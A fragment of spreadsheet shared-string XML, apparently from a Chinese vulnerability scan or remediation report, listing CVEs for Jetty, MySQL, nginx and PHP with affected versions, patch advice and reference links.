    <t>厂商补丁:目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/eclipse/jetty.project/security/advisories/GHSA-p26g-97m4-6q7c</t>
  </si>
  <si>
    <t>Eclipse Jetty 资源管理错误漏洞(CVE-2023-26048)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/eclipse/jetty.project/security/advisories/GHSA-qw69-rqj8-6qw8</t>
  </si>
  <si>
    <t>Eclipse Jetty 安全漏洞(CVE-2023-36479)</t>
  </si>
  <si>
    <t>影响Jetty:9.0.0版本(含)到9.4.51版本(含),10.0.0版本(含)到10.0.15版本(含),11.0.0版本(含)到11.0.15版本(含)</t>
  </si>
  <si>
    <t>厂商已经发布更新版本，建议参考如下链接进行修复https://github.com/eclipse/jetty.project/security/advisories/GHSA-3gh6-v5v9-6v9j</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2023-36479</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20981)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20977)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20966)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20960)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20971)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20963)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-21101)</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到 8.0.36版本(含),8.3.0版本,7.5.0版本(含)到 7.5.33版本(含),7.6.0版本(含)到 7.6.29版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2023-6129)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-21013)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20994)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-20993)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2024-21061)</t>
  </si>
  <si>
    <t>nginx漏洞(CVE-2022-41741)</t>
  </si>
  <si>
    <t>影响nginx: 1.1.3版本(含)至1.22.0版本(含),1.23.0版本,1.23.1版本,r1版本,r2版本,r22版本(含)至r27版本(含)</t>
  </si>
  <si>
    <t>升级至最新版本，官方下载链接：https://nginx.org/en/download.html</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2022-41742
https://support.f5.com/csp/article/K28112382</t>
  </si>
  <si>
    <t>Nginx 信任管理问题漏洞(CVE-2021-3618)</t>
  </si>
  <si>
    <t>影响Nginx:1.21.0以下版本</t>
  </si>
  <si>
    <t>厂商升级:Nginx-----目前厂商已经发布了新版本以修复这个安全问题，请到厂商的主页下载：下载链接：http://nginx.org/en/download.html</t>
  </si>
  <si>
    <t>PHP 缓冲区错误漏洞(CVE-2017-12933)</t>
  </si>
  <si>
    <t>PHP: 5.6.25</t>
  </si>
  <si>
    <t>影响PHP:5.6.31以下版本,7.0.0版本(含)到7.0.21版本,7.1.0版本(含)到7.1.7版本</t>
  </si>
  <si>
    <t>参见《PHP 缓冲区错误漏洞(CVE-2017-12933)-修复方案》</t>
  </si>
  <si>
    <t>https://cxsecurity.com/cveshow/CVE-2017-12933
https://www.ubuntu.com/usn/usn-3566-1
https://access.redhat.com/security/cve/CVE-2017-12933
https://www.suse.com/security/cve/CVE-2017-12933/
https://www.debian.org/security/2018/dsa-4081
https://www.debian.org/security/2018/dsa-4080</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2015-8994)</t>
  </si>
  <si>
    <t>影响PHP:5.0.0版本(含)到5.6.29版本(含),7.0.0版本(含)到7.0.13版本,7.0.14版本(含)到7.0.15版本</t>
  </si>
  <si>
    <t>参见《PHP 安全漏洞(CVE-2015-8994)-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201702-946
https://cxsecurity.com/cveshow/CVE-2015-8994</t>
  </si>
  <si>
    <t>PHP 安全漏洞 (CVE-2016-10397)</t>
  </si>
  <si>
    <t>影响PHP:5.6.28以下版本,7.0.0版本(含)到7.0.13版本</t>
  </si>
  <si>
    <t>参见《PHP 安全漏洞 (CVE-2016-10397)-修复方案》</t>
  </si>
  <si>
    <t>http://php.net/ChangeLog-5.php
http://openwall.com/lists/oss-security/2017/07/10/6
http://git.php.net/?p=php-src.git;a=commit;h=b061fa909de77085d3822a89ab901b934d0362c4
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-410
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10397
https://www.cnvd.org.cn/flaw/show/CNVD-2017-23336</t>
  </si>
  <si>
    <t>PHP GD Graphics Library 整数溢出漏洞 (CVE-2016-7568)</t>
  </si>
  <si>
    <t>影响PHP:5.6.0版本(含)到5.6.26版本(含),7.0.0版本(含)到7.0.11版本(含)</t>
  </si>
  <si>
    <t>参见《PHP GD Graphics Library 整数溢出漏洞 (CVE-2016-7568)-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201609-626
http://www.debian.org/security/2016/dsa-3693
https://github.com/libgd/libgd/commit/40bec0f38f50e8510f5bb71a82f516d46facde03
https://bugs.php.net/bug.php?id=73003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7568
https://www.cnvd.org.cn/flaw/show/CNVD-2016-08449</t>
  </si>
  <si>
    <t>PHP 双重释放漏洞 (CVE-2015-8880)</t>
  </si>
  <si>
    <t>影响PHP:7.0.0以下版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>http://php.net/ChangeLog-7.php
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8880
https://www.cnvd.org.cn/flaw/show/CNVD-2016-03566</t>
  </si>
  <si>
    <t>PHP 安全漏洞（CVE-2019-9024）</t>
  </si>
  <si>
    <t>影响PHP:5.6.40以下版本,7.0版本(含)到7.1.26版本,7.2版本(含)到7.2.14版本,7.3版本(含)到7.3.1版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://bugs.php.net/bug.php?id=77380</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=77380</t>
  </si>
  <si>
    <t>PHP 缓冲区错误漏洞(CVE-2016-10166)</t>
  </si>
  <si>
    <t>影响PHP: 7.2.0版本(含)到7.2.14版本,7.1.0版本(含)到7.1.26版本,7.0.0版本(含)到7.0.3版本,5.6.0版本(含)到5.6.40版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/libgd/libgd/commit/60bfb401ad5a4a8ae995dcd36372fe15c71e1a35</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201702-487
http://www.openwall.com/lists/oss-security/2017/01/28/6</t>
  </si>
  <si>
    <t>nginx漏洞(CVE-2022-41742)</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2016-9138)</t>
  </si>
  <si>
    <t>影响PHP:5.6.27以下版本(含),7.0.0版本(含)到7.0.12版本(含)</t>
  </si>
  <si>
    <t>参见《PHP 安全漏洞(CVE-2016-9138)-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201701-013
https://cxsecurity.com/cveshow/CVE-2016-9138</t>
  </si>
  <si>
    <t>PHP 信息泄露漏洞 (CVE-2017-11146)</t>
  </si>
  <si>
    <t>参见《PHP 信息泄露漏洞 (CVE-2017-11146)-修复方案》</t>
  </si>
  <si>
    <t>http://php.net/ChangeLog-7.php
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-406
http://openwall.com/lists/oss-security/2017/07/10/6
http://php.net/ChangeLog-5.php
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11146
https://www.cnvd.org.cn/flaw/show/CNVD-2017-22595</t>
  </si>
  <si>
    <t>PHP 缓冲区错误漏洞（CVE-2019-9023）</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：http://www.php.net/</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=77418</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2017-11143)</t>
  </si>
  <si>
    <t>影响PHP:5.6.30以下版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=74145
http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP CURLFile 拒绝服务漏洞(CVE-2016-9137)</t>
  </si>
  <si>
    <t>影响PHP:5.6.27以下版本,7.0版本(含)到7.0.12版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-7.phphttp://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201611-452</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2016-7480)</t>
  </si>
  <si>
    <t>影响PHP:7.0.12以下版本</t>
  </si>
  <si>
    <t>参见《PHP 安全漏洞(CVE-2016-7480)-修复方案》</t>
  </si>
  <si>
    <t>https://cxsecurity.com/cveshow/CVE-2016-7480</t>
  </si>
  <si>
    <t>PHP GD Graphics Library 缓冲区错误漏洞(CVE-2016-8670)</t>
  </si>
  <si>
    <t>参见《PHP GD Graphics Library 缓冲区错误漏洞(CVE-2016-8670)-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-440
https://cxsecurity.com/cveshow/CVE-2016-8670
https://www.cvedetails.com/cve/CVE-2016-8670/?q=CVE-2016-8670</t>
  </si>
  <si>
    <t>PHP 安全漏洞 (CVE-2017-7272)</t>
  </si>
  <si>
    <t>影响PHP:7.1.3以下版本(含)</t>
  </si>
  <si>
    <t>参见《PHP 安全漏洞 (CVE-2017-7272)-修复方案》</t>
  </si>
  <si>
    <t>https://github.com/php/php-src/commit/bab0b99f376dac9170ac81382a5ed526938d595a
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7272
https://www.cnvd.org.cn/flaw/show/CNVD-2017-04604
https://bugs.php.net/bug.php?id=75505</t>
  </si>
  <si>
    <t>PHP 安全漏洞 (CVE-2018-19396)</t>
  </si>
  <si>
    <t>影响PHP:5.0.0版本(含)到7.1.24版本(含)</t>
  </si>
  <si>
    <t>参见《PHP 安全漏洞 (CVE-2018-19396)-修复方案》</t>
  </si>
  <si>
    <t>https://usn.ubuntu.com/3821-2/
https://usn.ubuntu.com/3871-5/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19396
https://www.cnvd.org.cn/flaw/show/CNVD-2019-06902</t>
  </si>
  <si>
    <t>PHP 安全漏洞（CVE-2019-9021）</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://bugs.php.net/bug.php?id=77247</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=77247</t>
  </si>
  <si>
    <t>PHP 拒绝服务漏洞（CVE-2018-19935）</t>
  </si>
  <si>
    <t>影响PHP:5.0.0版本(含)到5.6.39版本,7.0版本(含)到7.0.33版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://bugs.php.net/bug.php?id=77020</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=77020</t>
  </si>
  <si>
    <t>PHP 安全漏洞（CVE-2019-9020）</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：http://www.php.net/、https://bugs.php.net/bug.php?id=77249</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=77249</t>
  </si>
  <si>
    <t>PHP zend_string_extend函数拒绝服务漏洞(CVE-2017-8923)</t>
  </si>
  <si>
    <t>影响PHP:7.1.5以下版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=74577</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=74577</t>
  </si>
  <si>
    <t>PHP 整数溢出漏洞(CVE-2016-3078)</t>
  </si>
  <si>
    <t>ips-11020703（有效）</t>
  </si>
  <si>
    <t>影响PHP:7.0.5以下版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://php.net/ChangeLg-7.php</t>
  </si>
  <si>
    <t>http://www.securitytracker.com/id/1035701
https://bugs.php.net/bug.php?id=71923</t>
  </si>
  <si>
    <t>PHP exif_convert_any_to_int函数拒绝服务漏洞(CVE-2016-10158)</t>
  </si>
  <si>
    <t>影响PHP:5.6.30以下版本,7.0版本(含)到7.0.15版本,7.1版本(含)到7.1.1版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=73737</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=73737</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2017-11142)</t>
  </si>
  <si>
    <t>影响PHP:5.6.30以下版本(含),7.0版本(含)到7.0.17版本,7.1版本(含)到7.1.3版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://php.net/ChangeLog-5.php、http://php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>http://php.net/ChangeLog-7.php
http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2017-11144)</t>
  </si>
  <si>
    <t>影响PHP:5.6.30以下版本(含),7.0版本(含)到7.0.21版本,7.1版本(含)到7.1.7版本</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=74651
https://www.tenable.com/security/tns-2017-12</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2017-11147)</t>
  </si>
  <si>
    <t>影响PHP:5.6.30以下版本,7.0版本(含)到7.0.15版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://php.net/ChangeLog-7.php、http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=73773
http://php.net/ChangeLog-7.php
http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2017-11145)</t>
  </si>
  <si>
    <t>影响PHP:5.6.31以下版本,7.0版本(含)到7.0.21版本,7.1版本(含)到7.1.7版本</t>
  </si>
  <si>
    <t>PHP 缓冲区错误漏洞(CVE-2017-11628)</t>
  </si>
  <si>
    <t>影响PHP:5.6版本(含)到5.6.31版本,7.0版本(含)到7.0.21版本,7.1版本(含)到7.1.7版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.phphttp://php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1228
https://bugs.php.net/bug.php?id=74603</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2016-10161)</t>
  </si>
  <si>
    <t>影响PHP:5.6版本(含)到5.6.30版本,7.0版本(含)到7.0.15版本,7.1版本(含)到7.1.1版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://bugs.php.net/bug.php?id=72321</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201702-185
http://php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>PHP ext/wddx/wddx.c拒绝服务漏洞(CVE-2016-9935)</t>
  </si>
  <si>
    <t>影响PHP:5.6.29以下版本,7.0版本(含)到7.0.14版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-7.php、http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>http://www.php.net/ChangeLog-7.php
http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP 'gd_gif_in.c'内存破坏漏洞（CVE-2017-7890）</t>
  </si>
  <si>
    <t>ips-11021952, ips-11024076, ips-11024077（有效）</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://php.net/ChangeLog-5.phphttp://php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-772
https://bugs.php.net/bug.php?id=74435</t>
  </si>
  <si>
    <t>PHP ext/wddx/wddx.c拒绝服务漏洞(CVE-2016-9934)</t>
  </si>
  <si>
    <t>影响PHP:5.6.28以下版本,7.0版本(含)到7.0.13版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://gist.github.com/anonymous/5949c2ca31fb5bb030773a8e78571444</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201612-307</t>
  </si>
  <si>
    <t>PHP gdImageFillToBorder函数拒绝服务漏洞(CVE-2016-9933)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201612-419</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2016-7412)</t>
  </si>
  <si>
    <t>影响PHP:5.6.26以下版本,7.0版本(含)到7.0.11版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201609-329
https://bugs.php.net/bug.php?id=72293</t>
  </si>
  <si>
    <t>PHP 信息泄露漏洞（CVE-2018-10549）</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到5.6.36版本,7.0版本(含)到7.0.30版本,7.1版本(含)到7.1.17版本,7.2版本(含)到7.2.5版本</t>
  </si>
  <si>
    <t>http://php.net/ChangeLog-5.php
http://php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2018-5712)</t>
  </si>
  <si>
    <t>ips-11020694（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到5.6.33版本,7.0版本(含)到7.0.27版本,7.1版本(含)到7.1.13版本,7.2版本(含)到7.2.1版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-586</t>
  </si>
  <si>
    <t>PHP 拒绝服务漏洞(CVE-2016-10167)</t>
  </si>
  <si>
    <t>影响PHP:7.1.0版本(含)到7.1.1版本,7.0.0版本(含)到7.0.15版本,5.6.0版本(含)到5.6.30版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://vcs.pcre.org/pcre/code/trunk/ChangeLog?view=markup</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201702-488
http://www.securitytracker.com/id/1037659</t>
  </si>
  <si>
    <t>PHP 越界读取漏洞(CVE-2017-9224)</t>
  </si>
  <si>
    <t>影响PHP:7.1.0版本(含)到7.1.7版本,7.0.0版本(含)到7.0.21版本,5.6.0版本(含)到5.6.31版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.sqlite.org/releaselog/3_8_9.html</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201705-1200
https://github.com/kkos/oniguruma/issues/57</t>
  </si>
  <si>
    <t>PHP 安全限制绕过漏洞（CVE-2018-10545）</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到5.6.35版本,7.0版本(含)到7.0.29版本,7.1版本(含)到7.1.16版本,7.2版本(含)到7.2.4版本</t>
  </si>
  <si>
    <t>PHP 堆缓冲器溢出漏洞（CVE-2017-16642）</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到5.6.32版本,7.0版本(含)到7.0.25版本,7.1版本(含)到7.1.11版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://php.net/ChangeLog-5.php、http://php.net/ChangeLog-7.php、https://bugs.php.net/bug.php?id=75055、https://github.com/derickr/timelib/commit/aa9156006e88565e1f1a5f7cc088b18322d57536、https://github.com/php/php-src/commit/5c0455bf2c8cd3c25401407f158e820aa3b239e1</t>
  </si>
  <si>
    <t>http://php.net/ChangeLog-5.php
http://php.net/ChangeLog-7.php
https://bugs.php.net/bug.php?id=75055
https://github.com/derickr/timelib/commit/aa9156006e88565e1f1a5f7cc088b18322d57536
https://github.com/php/php-src/commit/5c0455bf2c8cd3c25401407f158e820aa3b239e1</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2016-1283)</t>
  </si>
  <si>
    <t>影响PHP:7.1.0版本(含)到7.1.11版本,7.0.0版本(含)到7.0.25版本,5.6.0版本(含)到5.6.32版本</t>
  </si>
  <si>
    <t>厂商补丁:PHP-----------目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：https://www.php.net/ChangeLog-5.phphttps://www.php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>PHP EXIF组件安全漏洞（CVE-2019-9638）</t>
  </si>
  <si>
    <t>影响PHP:7.1.27以下版本,7.2.0版本(含)到7.2.16版本,7.3.0版本(含)到7.3.3版本</t>
  </si>
  <si>
    <t>厂商补丁: PHP --- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：  https://bugs.php.net/bug.php?id=77563</t>
  </si>
  <si>
    <t>https://www.php.net/
https://bugs.php.net/bug.php?id=77563
https://security.netapp.com/advisory/ntap-20190502-0007/</t>
  </si>
  <si>
    <t>PHP 安全漏洞（CVE-2019-9637）</t>
  </si>
  <si>
    <t>厂商补丁: PHP --- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： https://bugs.php.net/bug.php?id=77630</t>
  </si>
  <si>
    <t>https://www.php.net/
https://www.debian.org/security/2019/dsa-4403
https://bugs.php.net/bug.php?id=77630</t>
  </si>
  <si>
    <t>PHP 缓冲区错误漏洞(CVE-2018-20783)</t>
  </si>
  <si>
    <t>PHP&lt;5.6.397.0≤PHP&lt;7.0.337.1.0≤PHP&lt;7.1.257.2.0≤PHP&lt;7.2.13</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://www.php.net</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=77143
http://php.net/ChangeLog-5.php
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_15800&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2015-9253)</t>
  </si>
  <si>
    <t>影响PHP:7.1.20以下版本,7.2.0版本(含)到7.2.8版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载:http://www.php.net</t>
  </si>
  <si>
    <t>http://www.php.net</t>
  </si>
  <si>
    <t>PHP 拒绝服务漏洞(CVE-2016-7414)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201609-331
http://www.securitytracker.com/id/1036836</t>
  </si>
  <si>
    <t>PHP 拒绝服务漏洞(CVE-2016-7416)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.phphttp://www.php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201609-333
https://bugs.php.net/bug.php?id=73007</t>
  </si>
  <si>
    <t>PHP phar_parse_pharfile函数整数溢出漏洞（CVE-2016-10159）</t>
  </si>
  <si>
    <t>ips-11020704（有效）</t>
  </si>
  <si>
    <t>http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP 拒绝服务漏洞（CVE-2018-10546）</t>
  </si>
  <si>
    <t>PHP 跨站脚本漏洞（CVE-2018-10547）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201805-054
http://php.net/ChangeLog-7.php
https://bugs.php.net/bug.php?id=76129</t>
  </si>
  <si>
    <t>PHP HTTP_PROXY环境变量安全漏洞(CVE-2016-5385)</t>
  </si>
  <si>
    <t>影响PHP:7.0.8及之前版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://www.php.net/</t>
  </si>
  <si>
    <t>https://www.php.net/
http://www.securitytracker.com/id/1036335</t>
  </si>
  <si>
    <t>PHP 数字错误漏洞(CVE-2016-10168)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/libgd/libgd/commit/fe9ed49dafa993e3af96b6a5a589efeea9bfb36f</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201702-489
http://www.securitytracker.com/id/1037659</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2017-9229)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/libgd/libgd/commit/69d2fd2c597ffc0c217de1238b9bf4d4bceba8e6</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201705-1195
https://github.com/kkos/oniguruma/issues/59
https://access.redhat.com/errata/RHSA-2018:1296</t>
  </si>
  <si>
    <t>PHP 越界读取漏洞(CVE-2017-9227)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/kkos/oniguruma/issues/55</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201705-1197
https://github.com/kkos/oniguruma/issues/58</t>
  </si>
  <si>
    <t>PHP 拒绝服务安全漏洞（CVE-2018-19395）</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到7.1.24版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：https://bugs.php.net/bug.php?id=76182</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=76182</t>
  </si>
  <si>
    <t>php安全漏洞(CVE-2018-19518)</t>
  </si>
  <si>
    <t>ips-11020698（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.6.0版本(含)到5.6.38版本(含),7.0版本(含)到7.0.30版本(含),7.2版本(含)到7.2.12版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法： https://bugs.php.net/bug.php?id=76428https://bugs.php.net/bug.php?id=77153https://bugs.php.net/bug.php?id=77160</t>
  </si>
  <si>
    <t>PHP 安全漏洞（CVE-2019-9641）</t>
  </si>
  <si>
    <t>厂商补丁: PHP --- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：  https://bugs.php.net/bug.php?id=77509</t>
  </si>
  <si>
    <t>https://www.php.net/
https://www.debian.org/security/2019/dsa-4403
https://bugs.php.net/bug.php?id=77509</t>
  </si>
  <si>
    <t>PHP 远程代码执行漏洞(CVE-2022-31625)</t>
  </si>
  <si>
    <t>5.3.0≤PHP≤5.6.407.0.1≤PHP&lt;7.4.308.0.0≤PHP&lt;8.0.208.1.0≤PHP&lt;8.1.7</t>
  </si>
  <si>
    <t>当前官方已发布最新版本，建议受影响的用户及时更新升级到最新版本。链接如下：Windows系统: https://windows.php.net/downloadLinux系统：https://www.php.net/downloads.php</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=81720
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2022_04515&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>PHP ‘php_wddx_push_element’函数拒绝服务漏洞(CVE-2016-7418)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201609-335
http://www.securitytracker.com/id/1036836</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2016-7478)</t>
  </si>
  <si>
    <t>ips-11020696（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到5.6.28版本,7.0版本(含)到7.0.13版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201612-759</t>
  </si>
  <si>
    <t>PHP phar_parse_pharfile函数拒绝服务漏洞（CVE-2016-10160）</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=73768</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=73768
https://github.com/php/php-src/commit/bcd64a9bdd8afcf7f91a12e700d12d12eedc136b</t>
  </si>
  <si>
